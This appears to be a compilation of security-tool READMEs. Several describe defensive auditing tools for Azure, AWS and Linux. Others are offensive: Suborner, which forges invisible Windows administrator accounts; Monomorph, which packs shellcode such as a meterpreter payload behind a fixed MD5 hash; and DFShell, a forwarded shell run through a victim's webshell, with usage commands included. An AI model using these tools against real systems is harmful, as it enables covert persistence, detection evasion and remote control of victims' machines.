  • No Input sanitization is performed on launch params, as it is always assumed, that the input of these parameters are controlled. That being said, the tool uses extensively exec() - While I have not reviewed all paths, I believe that achieving shellcode execution is trivial. This tool does not assume hostile input, thus the recommendation is that you don't paste launch arguments into command line without reviewing them first.

Tool operation

Depedencies

To reduce amount of code we use the following depedencies for operation and aesthetics are used (Kudos to the maintainers of these fantastic packages)

package aesthetics operation license
axios
MIT
yargs
MIT
jsonwebtoken
MIT
chalk
MIT
js-beautify
MIT

Other depedencies for running the tool: If you are planning to run this in Azure Cloud Shell you don't need to install Azure CLI:

  • This tool does not include or distribute Microsoft Azure CLI, but rather uses it when it has been installed on the source system (Such as Azure Cloud Shell, which is primary platform for running EAST)

Azure Cloud Shell (BASH) or applicable Linux Distro / WSL

Requirement description Install
AZ CLI
AZCLI USE curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash
Node.js runtime 14
Node.js runtime for EAST install with NVM

Controls

EAST provides three categories of controls: Basic, Advanced, and Composite

The machine readable control looks like this, regardless of the type (Basic/advanced/composite):

{
"name": "fn-sql-2079",
"resource": "/subscriptions/6193053b-408b-44d0-b20f-4e29b9b67394/resourcegroups/rg-fn-2079/providers/microsoft.web/sites/fn-sql-2079",
"controlId": "managedIdentity",
"isHealthy": true,
"id": "/subscriptions/6193053b-408b-44d0-b20f-4e29b9b67394/resourcegroups/rg-fn-2079/providers/microsoft.web/sites/fn-sql-2079",
"Description": "\r\n Ensure The Service calls downstream resources with managed identity",
"metadata": {
"principalId": {
"type": "SystemAssigned",
"tenantId": "033794f5-7c9d-4e98-923d-7b49114b7ac3",
"principalId": "cb073f1e-03bc-440e-874d-5ed3ce6df7f8"
},
"roles": [{
"role": [{
"properties": {
"roleDefinitionId": "/subscriptions/6193053b-408b-44d0-b20f-4e29b9b67394/providers/Microsoft.Authorization/roleDefinitions/b24988ac-6180-42a0-ab88-20f7382dd24c",
"principalId": "cb073f1e-03b c-440e-874d-5ed3ce6df7f8",
"scope": "/subscriptions/6193053b-408b-44d0-b20f-4e29b9b67394/resourceGroups/RG-FN-2079",
"createdOn": "2021-12-27T06:03:09.7052113Z",
"updatedOn": "2021-12-27T06:03:09.7052113Z",
"createdBy": "4257db31-3f22-4c0f-bd57-26cbbd4f5851",
"updatedBy": "4257db31-3f22-4c0f-bd57-26cbbd4f5851"
},
"id": "/subscriptions/6193053b-408b-44d0-b20f-4e29b9b67394/resourceGroups/RG-FN-2079/providers/Microsoft.Authorization/roleAssignments/ada69f21-790e-4386-9f47-c9b8a8c15674",
"type": "Microsoft.Authorization/roleAssignments",
"name": "ada69f21-790e-4386-9f47-c9b8a8c15674",
"RoleName": "Contributor"
}]
}]
},
"category": "Access"
},

Basic

Basic controls include checks on the initial ARM object for simple "toggle on/off"- boolean settings of said service.

Example: Azure Container Registry adminUser

acr_adminUser


Portal EAST

if (item.properties?.adminUserEnabled == false ){returnObject.isHealthy = true }

Advanced

Advanced controls include checks beyond the initial ARM object. Often invoking new requests to get further information about the resource in scope and it's relation to other services.

Example: Role Assignments

Besides checking the role assignments of subscription, additional check is performed via Azure AD Conditional Access Reporting for MFA, and that privileged accounts are not only protected by passwords (SPN's with client secrets)

Example: Azure Data Factory

ADF_pipeLineRuns

Azure Data Factory pipeline mapping combines pipelines -> activities -> and data targets together and then checks for secrets leaked on the logs via run history of the said activities.



Composite

Composite controls combines two or more control results from pipeline, in order to form one, or more new controls. Using composites solves two use cases for EAST

  1. You cant guarantee an order of control results being returned in the pipeline
  2. You need to return more than one control result from single check

Example: composite_resolve_alerts

  1. Get alerts from Microsoft Cloud Defender on subscription check
  2. Form new controls per resourceProvider for alerts

Reporting

EAST is not focused to provide automated report generation, as it provides mostly JSON files with control and evaluation status. The idea is to use separate tooling to create reports, which are fairly trivial to automate via markdown creation scripts and tools such as Pandoc

  • While focus is not on the reporting, this repo includes example automation for report creation with pandoc to ease reading of the results in single document format.

While this tool does not distribute pandoc, it can be used when creation of the reports, thus the following citation is added: https://github.com/jgm/pandoc/blob/master/CITATION.cff

cff-version: 1.2.0
title: Pandoc
message: "If you use this software, please cite it as below."
type: software
url: "https://github.com/jgm/pandoc"
authors:
- given-names: John
family-names: MacFarlane
email: jgm@berkeley.edu
orcid: 'https://orcid.org/0000-0003-2557-9090'
- given-names: Albert
family-names: Krewinkel
email: tarleb+github@moltkeplatz.de
orcid: '0000-0002-9455-0796'
- given-names: Jesse
family-names: Rosenthal
email: jrosenthal@jhu.edu

Running EAST scan

This part has guide how to run this either on BASH@linux, or BASH on Azure Cloud Shell (obviously Cloud Shell is Linux too, but does not require that you have your own linux box to use this)

⚠️If you are running the tool in Cloud Shell, you might need to reapply some of the installations again as Cloud Shell does not persist various session settings.

Fire and forget prerequisites on cloud shell

curl -o- https://raw.githubusercontent.com/jsa2/EAST/preview/sh/initForuse.sh | bash;

jump to next step

Detailed Prerequisites (This is if you opted no to do the "fire and forget version")

Prerequisites

git clone https://github.com/jsa2/EAST --branch preview
cd EAST;
npm install

Pandoc installation on cloud shell

# Get pandoc for reporting (first time only)
wget "https://github.com/jgm/pandoc/releases/download/2.17.1.1/pandoc-2.17.1.1-linux-amd64.tar.gz";
tar xvzf "pandoc-2.17.1.1-linux-amd64.tar.gz" --strip-components 1 -C ~

Installing pandoc on distros that support APT

# Get pandoc for reporting (first time only)
sudo apt install pandoc

Login Az CLI and run the scan

# Relogin is required to ensure token cache is placed on session on cloud shell

az account clear
az login

#
cd EAST
# replace the subid below with your subscription ID!
subId=6193053b-408b-44d0-b20f-4e29b9b67394
#
node ./plugins/main.js --batch=10 --nativescope=true --roleAssignments=true --helperTexts=true --checkAad=true --scanAuditLogs --composites --subInclude=$subId


Generate report

cd EAST; node templatehelpers/eastReports.js --doc

  • If you want to include all Azure Security Benchmark results in the report

cd EAST; node templatehelpers/eastReports.js --doc --asb

Export report from cloud shell

pandoc -s fullReport2.md -f markdown -t docx --reference-doc=pandoc-template.docx -o fullReport2.docx


Azure Devops (Experimental) There is Azure Devops control for dumping pipeline logs. You can specify the control run by following example:

node ./plugins/main.js --batch=10 --nativescope=true --roleAssignments=true --helperTexts=true --checkAad=true --scanAuditLogs --composites --subInclude=$subId --azdevops "organizationName"

Licensing

Community use

  • Share relevant controls across multiple environments as community effort

Company use

  • Companies have possibility to develop company specific controls which apply to company specific work. Companies can then control these implementations by decision to share, or not share them based on the operating principle of that company.

Non IPR components

  • Code logic and functions are under MIT license. since code logic and functions are alredy based on open-source components & vendor API's, it does not make sense to restrict something that is already based on open source

If you use this tool as part of your commercial effort we only require, that you follow the very relaxed terms of MIT license

Read license

Tool operation documentation

Principles

AZCLI USE

Existing tooling enhanced with Node.js runtime

Use rich and maintained context of Microsoft Azure CLI login & commands with Node.js control flow which supplies enhanced rest-requests and maps results to schema.

  • This tool does not include or distribute Microsoft Azure CLI, but rather uses it when it has been installed on the source system (Such as Azure Cloud Shell, which is primary platform for running EAST)

Speedup

View more details

✅Using Node.js runtime as orchestrator utilises Nodes asynchronous nature allowing batching of requests. Batching of requests utilizes the full extent of Azure Resource Managers incredible speed.

✅Compared to running requests one-by-one, the speedup can be up to 10x, when Node executes the batch of requests instead of single request at time

Parameters reference

Example:

node ./plugins/main.js --batch=10 --nativescope --roleAssignments --helperTexts=true --checkAad --scanAuditLogs --composites --shuffle --clearTokens
Param Description Default if undefined
--nativescope Currently mandatory parameter no values
--shuffle Can help with throttling. Shuffles the resource list to reduce the possibility of resource provider throttling threshold being met no values
--roleAssignments Checks controls as per microsoft.authorization no values
--includeRG Checks controls with ResourceGroups as per microsoft.authorization no values
--checkAad Checks controls as per microsoft.azureactivedirectory no values
--subInclude Defines subscription scope no default, requires subscriptionID/s, if not defined will enumerate all subscriptions the user have access to
--namespace text filter which matches full, or part of the resource ID
example /microsoft.storage/storageaccounts all storage accounts in the scope
optional parameter
--notIncludes text filter which matches full, or part of the resource ID
example /microsoft.storage/storageaccounts all storage accounts in the scope are excluded
optional parameter
--batch size of batch interval between throttles 5
--wait size of batch interval between throttles 1500
--scanAuditLogs optional parameter. When defined in hours will toggle Azure Activity Log scanning for weak authentication events
defined in: scanAuditLogs
24h
--composites read composite no values
--clearTokens clears tokens in session folder, use this if you get authorization errors, or have just changed to other az login account
use az account clear if you want to clear AZ CLI cache too
no values
--tag Filter all results in the end based on single tag--tag=svc=aksdev no values
--ignorePreCheck use this option when used with browser delegated tokens no values
--helperTexts Will append text descriptions from general to manual controls no values
--reprocess Will update results to existing content.json. Useful for incremental runs no values

Parameters reference for example report:

node templatehelpers/eastReports.js --asb 
Param Description Default if undefined
--asb gets all ASB results available to users no values
--policy gets all Policy results available to users no values
--doc prints pandoc string for export to console no values

(Highly experimental) Running in restricted environments where only browser use is available

Read here Running in restricted environments

Developing controls

Developer guide including control flow description is here dev-guide.md

Updates and examples

Auditing Microsoft.Web provider (Functions and web apps)

✅Check roles that are assigned to function managed identity in Azure AD and all Azure Subscriptions the audit account has access to
✅Relation mapping, check which keyVaults the function uses across all subs the audit account has access to
✅Check if Azure AD authentication is enabled
✅Check that generation of access tokens to the api requires assigment .appRoleAssignmentRequired
✅Audit bindings
  • Function or Azure AD Authentication enabled
  • Count and type of triggers

✅Check if SCM and FTP endpoints are secured


Azure RBAC baseline authorization

⚠️Detect principals in privileged subscriptions roles protected only by password-based single factor authentication.
  • Checks for users without MFA policies applied for set of conditions
  • Checks for ServicePrincipals protected only by password (as opposed to using Certificate Credential, workload federation and or workload identity CA policy)

Maps to App Registration Best Practices

  • An unused credential on an application can result in security breach. While it's convenient to use password. secrets as a credential, we strongly recommend that you use x509 certificates as the only credential type for getting tokens for your application

✅State healthy - User result example

{ 
"subscriptionName": "EAST -msdn",
"friendlyName": "joosua@thx138.onmicrosoft.com",
"mfaResults": {
"oid": "138ac68f-d8a7-4000-8d41-c10ff26a9097",
"appliedPol": [{
"GrantConditions": "challengeWithMfa",
"policy": "baseline",
"oid": "138ac68f-d8a7-4000-8d41-c10ff26a9097"
}],
"checkType": "mfa"
},
"basicAuthResults": {
"oid": "138ac68f-d8a7-4000-8d41-c10aa26a9097",
"appliedPol": [{
"GrantConditions": "challengeWithMfa",
"policy": "baseline",
"oid": "138ac68f-d8a7-4000-8d41-c10aa26a9097"
}],
"checkType": "basicAuth"
},
}

⚠️State unHealthy - Application principal example

{ 
"subscriptionName": "EAST - HoneyPot",
"friendlyName": "thx138-kvref-6193053b-408b-44d0-b20f-4e29b9b67394",
"creds": {
"@odata.context": "https://graph.microsoft.com/beta/$metadata#servicePrincipals(id,displayName,appId,keyCredentials,passwordCredentials,servicePrincipalType)/$entity",
"id": "babec804-037d-4caf-946e-7a2b6de3a45f",
"displayName": "thx138-kvref-6193053b-408b-44d0-b20f-4e29b9b67394",
"appId": "5af1760e-89ff-46e4-a968-0ac36a7b7b69",
"servicePrincipalType": "Application",
"keyCredentials": [],
"passwordCredentials": [],
"OnlySingleFactor": [{
"customKeyIdentifier": null,
"endDateTime": "2023-10-20T06:54:59.2014093Z",
"keyId": "7df44f81-a52c-4fd6-b704-4b046771f85a",
"startDateTime": "2021-10-20T06:54:59.2014093Z",
"secretText": null,
"hint": nu ll,
"displayName": null
}],
"StrongSingleFactor": []
}
}

Contributing

Following methods work for contributing for the time being:

  1. Submit a pull request with code / documentation change
  2. Submit a issue
    • issue can be a:
    • ⚠️Problem (issue)
    • Feature request
    • ❔Question

Other

  1. By default EAST tries to work with the current depedencies - Introducing new (direct) depedencies is not directly encouraged with EAST. If such vital depedency is introduced, then review licensing of such depedency, and update readme.md - depedencies
    • There is nothing to prevent you from creating your own fork of EAST with your own depedencies


Aws-Security-Assessment-Solution - An AWS Tool To Help You Create A Point In Time Assessment Of Your AWS Account Using Prowler And Scout As Well As Optional AWS Developed Ransomware Checks


Self-Service Security Assessment too l

Cybersecurity remains a very important topic and point of concern for many CIOs, CISOs, and their customers. To meet these important concerns, AWS has developed a primary set of services customers should use to aid in protecting their accounts. Amazon GuardDuty, AWS Security Hub, AWS Config, and AWS Well-Architected reviews help customers maintain a strong security posture over their AWS accounts. As more organizations deploy to the cloud, especially if they are doing so quickly, and they have not yet implemented the recommended AWS Services, there may be a need to conduct a rapid security assessment of the cloud environment.

With that in mind, we have worked to develop an inexpensive, easy to deploy, secure, and fast solution to provide our customers two (2) security assessment reports. These security assessments are from the open source projects “Prowler” and “ScoutSuite.” Each of these projects conduct an assessment based on AWS best practices and can help quickly identify any potential risk areas in a customer’s deployed environment. If you are interested in conducting these assessments on a continuous basis, AWS recommends enabling Security Hub’s Foundational Security Best P ractices standard. If you are interested in integrating your Prowler assessment results with Security Hub, you can also do that from Prowler natively following instructions here.

In addition, we have developed custom modules that speak to customer concerns around threats and misconfigurations of those issues, currently this includes checks for ransomware specific findings.


ARCHITECTURE OVERVIEW

Overview - Open Source project checks

The architecture we deploy is a very simple VPC with two (2) subnets, one (1) NAT Gateway, one (1) EC2 instance, and one (1) S3 Bucket. The EC2 instance is using Amazon Linux 2 (the latest published AMI), that is patched on boot, pulls down the two projects (Prowler and ScoutSuite), runs the assessments and then delivers the reports to the S3 Bucket. The EC2 instances does not deploy with any EC2 Key Pair, does not have any open ingress rules on its Security Group, and is placed in the Private Subnet so it does not have direct internet access. After completion of the assessment and the delivery of the reports the system can be terminated.

The deployment is accomplished through the use of CloudFormation. A single CloudFormation template is used to launch a few other templates (in a modular approach). No parameters (user input) is required and the automated build out of the environment will take on average less than 10 minutes to complete. These templates are provided for review in this Github repository.

Once the EC2 Instance has been created and begins, the two assessments it will take somewhere around 40 minutes to complete. At the end of the assessments and after the two reports are delivered to the S3 Bucket the Instance will automatically shutdown, You may at this time safely terminate the Instance.

How to deploy this tool

How do I read the reports?

Diagram

Here is a diagram of the architecture.

What will be created

  • A VPC

    • This will be a /26 for the VPC
    • This will include 2 subnets both in the same Availability Zone, one Public and one Private
    • This will include the required Route Tables and ACLs
  • An EIP

    • For use by the NAT Gateway
  • A NAT Gateway

    • This is required for the instance to download both Prowler and ScoutSuite as well as to make the API Calls
  • A Security Group

    • For the Instance
  • A single m5a.large instance with a 10 GB gp2 EBS volume

    • This is the instance in which Prowler and ScoutSuite will run
    • It will be in a Private Subnet
    • It will not have an EC2 Key Pair
    • It will not allow ingress traffic on the Security Group
  • An Instance Role

    • This Role is required so that Prowler and ScoutSuite can run the API calls from the EC2 Instance
  • An IAM Policy

    • Some IAM permissions are required for Prowler and ScoutSuite
      • Prowler info here
      • ScoutSuite info here
  • An S3 Bucket

    • This is the location where the reports will be delivered
    • It will take about 40 minutes for the reports to show up

Open source security Assessments

These security assessments are from the open source projects “Prowler” and “ScoutSuite.” Each of these projects conduct an assessment based on AWS best practices and can help quickly identify any potential risk areas in a customer’s deployed environment.

1. Prowler

The first assessment is from Prowler.

  • Prowler follows guidelines of the CIS Amazon Web Services Foundations Benchmark (49 checks) and has 40 additional checks including related to GDPR and HIPAA, in total Prowler offers over 160 checks.

2. ScoutSuite

The second assessment is from ScoutSuite

  • ScoutSuite has been around since 2012, originally a Scout, then Scout2, and now ScoutSuite. This will provide a set of files that can be viewed in your browser and conducts a wide range of checks

Overiew of optional modules

► Check for Common Security Mistakes module

When enabled, this module will deploy a lambda function that checks for common security mistakes highlighted in https://www.youtube.com/watch?v=tmuClE3nWlk.

What will be created

A Lambda function that will perform the checks. Some of the checks include:

  • GuardDuty set to alert on findings
  • GuardDuty enabled across all regions
  • Prevent accidental key deletion
  • Existence of a Multi-region CloudTrail
  • CloudTrail validation enabled
  • No local IAM users
  • Roles tuned for least privilege in last 90 days
  • Alerting for root account use
  • Alerting for local IAM user create/delete
  • Use of Managed Prefix Lists in Security Groups
  • Public S3 Buckets

Ransomware modules

When enabled, this module will deploy separate functions that can help customers with evaluating their environment for ransomware infection and susceptibility to ransomware damage.

What will be created

  • AWS Core security services enabled
    • Checks for AWS security service enablement in all regions where applicable (GuardDuty, SecurityHub)
  • Data protection checks
    • Checks for EBS volumes with no snapshot
    • Checks for outdated OS running
    • Checks for S3 bucket replication JobStatus
    • Checks for EC2 instances that can not be managed with SSM
    • Checks for Stale IAM roles that have been granted S3 access but have not used them in the last 60 days
    • Checks for S3 deny public access enablement
    • Checks to see if DNSSEC is enabled for public hosted zones in Amazon Route 53
    • Checks to see if logging is enabled for services relevant to ransomware (i.e. CloudFront, Lambda, Route53 Query Logging, and Route 53 Resolver Logging).
    • Checks to see if Route 53 Resolver DNS Firewall is enabled across all relevant regions
    • Checks to see if there are any Access Keys that have not been used in last 90 days

► SolarWinds module

When enabled, this module will deploy separate functions that can help customers with evaluating their environment for SolarWinds vulnerability. The checks are based on CISA Alert AA20-352A from Appendix A & B.

Note: Prior to enablement of this module, please read the module documentation which reviews the steps that need to be completed prior to using this module.

Note: This module MUST be run separately as its own stack, select the S3 URL SelfServiceSecSolar.yml to deploy

What will be created

  • Athena query - AA20352A IP IOC
    • This Athena query will scan your VPC flow logs for IP addresses from the CISA AA20-352A.
  • SSM Automation document - SolorWindsAA20-352AAutomatedScanner
    • This is a systems manager automation document that will scan Windows EC2 instances for impacted .dll files from CISA AA20-352A.
  • Route53 DNS resolver query - AA20352A DNS IOC
    • This Athena query will scan your DNS logs for customers that have enabled DNS query logging

Frequently Asked Questions (FAQ)

  1. Is there a cost?
    • Yes. This should normally cost less than $1 for an hour of use.
  2. Is this a continuous monitoring and reporting tool?
    • No. This is a one-time assessment, we urge customers to leverage tooling like AWS SecurityHub for Ongoing assessments.
  3. Why does the CloudFormation service error when deleting the stack?
    • You must remove the objects (reports) out of the S3 bucket first
  4. Does this integrate with GuardDuty, Security Hub, CloudWatch, etc.?
    • Not at this time. In a future sprint we plan to incorporate integration with AWS services like Security Hub and GuardDuty. However, you can follow the instructions in this blog to integrate Prowler and Security Hub.
  5. How do I remediate the issues in the reports?
    • Generally, the issues should be described in the report with readily identifiable corrections. Please follow up with the public documentation for each tool (Prowler and ScoutSuite) as well. If this is insufficient, please reach out to your AWS Account team and we will be more than happy to help you understand the reports and work towards remediating issues.

Security

See CONTRIBUTING for more information.

License

This project is licensed under the Apache-2.0 License.



Suborner - The Invisible Account Forger


What's this?

A simple program to create a Windows account you will only know about :)

  • Create invisible local accounts without net user or Windows OS user management applications (e.g. netapi32::netuseradd)
  • Works on all Windows NT Machines (Windows XP to 11, Windows Server 2003 to 2022)
  • Impersonate through RID Hijacking any existing account (enabled or disabled) after a successful authentication

Create an invisible machine account with administrative privileges, and without invoking that annoying Windows Event Logger to report its creation!


Where can I see more?

Released at Black Hat USA 2022: Suborner: A Windows Bribery for Invisible Persistence

How can I use this?

Build

  • Make sure you have .NET 4.0 and Visual Studio 2019
  • Clone this repo: git clone https://github.com/r4wd3r/Suborner/
  • Open the .sln with Visual Studio
  • Build x86, x64 or both versions
  • Bribe Windows!

Release

Download the latest release and pwn!

Usage

Thanks!

This attack would not have been possible without the great research done by:

What's next?

Hack Suborn the planet!



Monomorph - MD5-Monomorphic Shellcode Packer - All Payloads Have The Same MD5 Hash

                                                
════════════════════════════════════╦═══
╔═╦═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╦═╗ ╔═╗ ╔══╔═╗ ╠═╗
═╩ ╩ ╩═╚═╝═╩ ╩═╚═╝═╩ ╩ ╩═╚═╝═╩ ╠═╝═╩ ╩═
════════════════════════════════╩═══════
By Retr0id

═══ MD5-Monomorphic Shellcode Packer ═ ══


USAGE: python3 monomorph.py input_file output_file [payload_file]

What does it do?

It packs up to 4KB of compressed shellcode into an executable binary, near-instantly. The output file will always have the same MD5 hash: 3cebbe60d91ce760409bbe513593e401

Currently, only Linux x86-64 is supported. It would be trivial to port this technique to other platforms, although each version would end up with a different MD5. It would also be possible to use a multi-platform polyglot file like APE.

Example usage:

$ python3 monomorph.py bin/monomorph.linux.x86-64.benign bin/monomorph.linux.x86-64.meterpreter sample_payloads/bin/linux.x64.meterpreter.bind_tcp.bin

Why?

People have previously used single collisions to toggle a binary between "good" and "evil" modes. Monomorph takes this concept to the next level.

Some people still insist on using MD5 to reference file samples, for various reasons that don't make sense to me. If any of these people end up investigating code packed using Monomorph, they're going to get very confused.

How does it work?

For every bit we want to encode, a colliding MD5 block has been pre-calculated using FastColl. As summarised here, each collision gives us a pair of blocks that we can swap out without changing the overall MD5 hash. The loader checks which block was chosen at runtime, to decode the bit.

To encode 4KB of data, we need to generate 4*1024*8 collisions (which takes a few hours), taking up 4MB of space in the final file.

To speed this up, I made some small tweaks to FastColl to make it even faster in practice, enabling it to be run in parallel. I'm sure there are smarter ways to parallelise it, but my naive approach is to start N instances simultaneously and wait for the first one to complete, then kill all the others.

Since I've already done the pre-computation, reconfiguring the payload can be done near-instantly. Swapping the state of the pre-computed blocks is done using a technique implemented by Ange Albertini.

Is it detectable?

Yes. It's not very stealthy at all, nor does it try to be. You can detect the collision blocks using detectcoll.



Sandfly-Entropyscan - Tool To Detect Packed Or Encrypt ed Binaries Related To Malware, Finds Malicious Files And Linux Processes And Gives Output With Cryptographic Hashes


What is sandfly-entropyscan?

sandfly-entropyscan is a utility to quickly scan files or running processes and report on their entropy (measure of randomness) and if they are a Linux/Unix ELF type executable. Some malware for Linux is packed or encrypted and shows very high entropy. This tool can quickly find high entropy executable files and processes which often are malicious.


Features

  • Written in Golang and is portable across multiple architectures with no modifications.
  • Standalone binary requires no dependencies and can be used instanly without loading any libraries on suspect machines.
  • Not affected by LD_PRELOAD style rootkits that are cloaking files.
  • Built-in PID busting to find hidden/cloaked processes from certain types of Loadable Kernel Module (LKM) rootkits.
  • Generates entropy and also MD5, SHA1, SHA256 and SHA512 hash values of files.
  • Can be used in scanning scripts to find problems automatically.
  • Can be used by incident responders to quickly scan and zero in on potential malware on a Linux host.

Why Scan for Entropy?

Entropy is a measure of randomness. For binary data 0.0 is not-random and 8.0 is perfectly random. Good crypto looks like random white noise and will be near 8.0. Good compression removes redundant data making it appear more random than if it was uncompressed and usually will be 7.7 or above.

A lot of malware executables are packed to avoid detection and make reverse engineering harder. Most standard Linux binaries are not packed because they aren't trying to hide what they are. Searching for high entropy files is a good way to find programs that could be malicious just by having these two attributes of high entropy and executable.

How Do I Use This?

Usage of sandfly-entropyscan:

-csv output results in CSV format (filename, path, entropy, elf_file [true|false], MD5, SHA1, SHA256, SHA512)

-delim change the default delimiter for CSV files of "," to one of your choosing ("|", etc.)

-dir string directory name to analyze

-file string full path to a single file to analyze

-proc check running processes (defaults to ELF only check)

-elf only check ELF executables

-entropy float show any file/process with entropy greater than or equal to this value (0.0 min - 8.0 max, defaults 0 to show all files)

-version show version and exit

Examples

Search for any file that is executable under /tmp:

sandfly-entropyscan -dir /tmp -elf

Search for high entropy (7.7 and higher) executables (often packed or encrypted) under /var/www:

sandfly-entropyscan -dir /var/www -elf -entropy 7.7

Generates entropy and cryptographic hashes of all running processes in CSV format:

sandfly-entropyscan -proc -csv

Search for any process with an entropy higher than 7.7 indicating it is likely packed or encrypted:

sandfly-entropyscan -proc -entropy 7.7

Generate entropy and cryptographic hash values of all files under /bin and output to CSV format (for instance to save and compare hashes):

sandfly-entropyscan -dir /bin -csv

Scan a directory for all files (ELF or not) with entropy greater than 7.7: (potentially large list of files that are compressed, png, jpg, object files, etc.)

sandfly-entropyscan -dir /path/to/dir -entropy 7.7

Quickly check a file and generate entropy, cryptographic hashes and show if it is executable:

sandfly-entropyscan -file /dev/shm/suspicious_file

Use Cases

Do spot checks on systems you think have a malware issue. Or you can automate the scan so you will get an output if we find something show up that is high entropy in a place you didn't expect. Or simply flag any executable ELF type file that is somewhere strange (e.g. hanging out in /tmp or under a user's HTML directory). For instance:

Did a high entropy binary show up under the system /var/www directory? Could be someone put a malware dropper on your website:

sandfly-entropyscan -dir /var/www -elf -entropy 7.7

Setup a cron task to scan your /tmp, /var/tmp, and /dev/shm directories for any kind of executable file whether it's high entropy or not. Executable files under tmp directories can frequently be a malware dropper.

sandfly-entropyscan -dir /tmp -elf

sandfly-entropyscan -dir /var/tmp -elf

sandfly-entropyscan -dir /dev/shm -elf

Setup another cron or automated security sweep to spot check your systems for highly compressed or encrypted binaries that are running:

sandfly-entropyscan -proc -entropy 7.7

Build

git clone https://github.com/sandflysecurity/sandfly-entropyscan.git

  • Go into the repo directory and build it:

go build

  • Run the binary with your options:

./sandfly-entropyscan

Build Scripts

There are a some basic build scripts that build for various platforms. You can use these to build or modify to suit. For Incident Responders, it might be useful to keep pre-compiled binaries ready to go on your investigation box.

build.sh - Build for current OS you're running on when you execute it.

ELF Detection

We use a simple method for seeing if a file may be an executable ELF type. We can spot ELF format files for multiple platforms. Even if malware has Intel/AMD, MIPS and Arm dropper binaries we will still be able to spot all of them.

False Positives

It's possible to flag a legitimate binary that has a high entropy because of how it was compiled, or because it was packed for legitimate reasons. Other files like .zip, .gz, .png, .jpg and such also have very high entropy because they are compressed formats. Compression removes redundancy in a file which makes it appear to be more random and has higher entropy.

On Linux, you may find some kinds of libraries (.so files) get flagged if you scan library directories.

However, it is our experience that executable binaries that also have high entropy are often malicious. This is especially true if you find them in areas where executables normally shouldn't be (such as again tmp or html directories).

Performance

The entropy calculation requires reading in all the bytes of the file and tallying them up to get a final number. It can use a lot of CPU and disk I/O, especially on very large file systems or very large files. The program has an internal limit where it won't calculate entropy on any file over 2GB, nor will it try to calculate entropy on any file that is not a regular file type (e.g. won't try to calculate entropy on devices like /dev/zero).

Then we calculate MD5, SHA1, SHA256 and SHA512 hashes. Each of these requires going over the file as well. It's reasonable speed on modern systems, but if you are crawling a very large file system it can take some time to complete.

If you tell the program to only look at ELF files, then the entropy/hash calculations won't happen unless it is an ELF type and this will save a lot of time (e.g. it will ignore massive database files that aren't executable).

If you want to automate this program, it's best to not have it crawl the entire root file system unless you want that specifically. A targeted approach will be faster and more useful for spot checks. Also, use the ELF flag as that will drastically reduce search times by only processing executable file types.

Incident Response

For incident responders, running sandfly-entropyscan against the entire top-level "/" directory may be a good idea just to quickly get a list of likely packed candidates to investigate. This will spike CPU and disk I/O. However, you probably don't care at that point since the box has been mining cryptocurrency for 598 hours anyway by the time the admins noticed.

Again, use the ELF flag to get to the likely problem candidate executables and ignore the noise.

Testing

There is a script called scripts/testfiles.sh that will make two files. One will be full of random data and one will not be random at all. When you run the script it will make the files and run sandfly-entropyscan in executable detection mode. You should see two files. One with very high entropy (at or near 8.0) and one full of non-random data that should be at 0.00 for low entropy. Example:

./testfiles.sh

Creating high entropy random executable-like file in current directory.

Creating low entropy executable-like file in current directory.

high.entropy.test, entropy: 8.00, elf: true

low.entropy.test, entropy: 0.00, elf: true

You can also load up the upx utility and compress an executable and see what values it returns.

Agentless Linux Security

Sandfly Security produces an agentless endpoint detection and incident response platform (EDR) for Linux. Automated entropy checks are just one of thousands of things we search for to find intruders without loading any software on your Linux endpoints.

Get a free license and learn more below:

https://www.sandflysecurity.com @SandflySecurity



DFShell - The Best Forwarded Shell


██████╗ ███████╗███████╗██╗  ██╗███████╗██╗     ██╗     
██╔══██╗██╔════╝██╔════╝██║ ██║███╔═══╝██║ ██║
██║ ██║█████╗ ███████╗███████║█████╗ ██║ ██║
██║ ██║██╔══╝ ╚════██║██╔══██║██╔══╝ ██║ ██║
██████╔╝██║ ███████║██║ ██║███████╗████████╗███████╗
╚═════╝ ╚═╝ ╚══════╝╚═╝ ╚═╝╚══════╝╚══════╝╚══════╝

D3Ext's Forwarded Shell it's a python3 script which use mkfifo to simulate a shell into the victim machine. It creates a hidden directory in /dev/shm/.fs/ and there are stored the fifos. You can even have a tty over a webshell.

In case you want a good webshell with code obfuscation, login panel and more functions you have this webshell (scripted by me), you can change the username and the password at the top of the file, it also have a little protection in case of beeing discovered because if the webshell is accessed from localhost it gives a 404 status code


Why you should use DFShell?

To use other forwarded shells you have to edit the script to change the url and the parameter of the webshell, but DFShell use parameters to quickly pass the arguments to the script (-u/--url and -p/--parameter), the script have a pretty output with colors, you also have custom commands to upload and download files from the target, do port and host discovery, and it deletes the files created on the victim if you press Ctrl + C or simply exit from the shell.

*If you change the actual user from webshell (or anything get unstable) then execute: 'sh'*

Installation:

Install with pip

pip3 install dfshell

Install from source

git clone https://github.com/D3Ext/DFShell
cd DFShell
pip3 install -r requirements

One-liner

git clone https://github.com/D3Ext/DFShell && cd DFShell && pip3 install -r requirements

Usage:

It's simple, you pass the url of the webshell and the parameter that executes commands. I recommend you the most simple webshell

python3 DFShell.py -u http://10.10.10.10/webshell.php -p cmd

Demo:



Yaralyzer - Visually Inspect And Force Decode YARA And Regex Matches Found In Both Binary And Text Data, With Colors


Visually inspect all of the regex matches (and their sexier, more cloak and dagger cousins, the YARA matches) found in binary data and/or text. See what happens when you force various character encodings upon those matched bytes. With colors.


Quick Start

pipx install yaralyzer

# Scan against YARA definitions in a file:
yaralyze --yara-rules /secret/vault/sigmunds_malware_rules.yara lacan_buys_the_dip.pdf

# Scan against an arbitrary regular expression:
yaralyze --regex-pattern 'good and evil.*of\s+\w+byte' the_crypto_archipelago.exe

# Scan against an arbitrary YARA hex pattern
yaralyze --hex-pattern 'd0 93 d0 a3 d0 [-] 9b d0 90 d0 93' one_day_in_the_life_of_ivan_cryptosovich.bin

What It Do

  1. See the actual bytes your YARA rules are matching. No more digging around copy/pasting the start positions reported by YARA into your favorite hex editor. Displays both the bytes matched by YARA as well as a configurable number of bytes before and after each match in hexadecimal and "raw" python string representation.
  2. Do the same for byte patterns and regular expressions without writing a YARA file. If you're too lazy to write a YARA file but are trying to determine, say, whether there's a regular expression hidden somewhere in the file you could scan for the pattern '/.+/' and immediately get a window into all the bytes in the file that live between front slashes. Same story for quotes, BOMs, etc. Any regex YARA can handle is supported so the sky is the limit.
  3. Detect the possible encodings of each set of matched bytes. The chardet library is a sophisticated library for guessing character encodings and it is leveraged here.
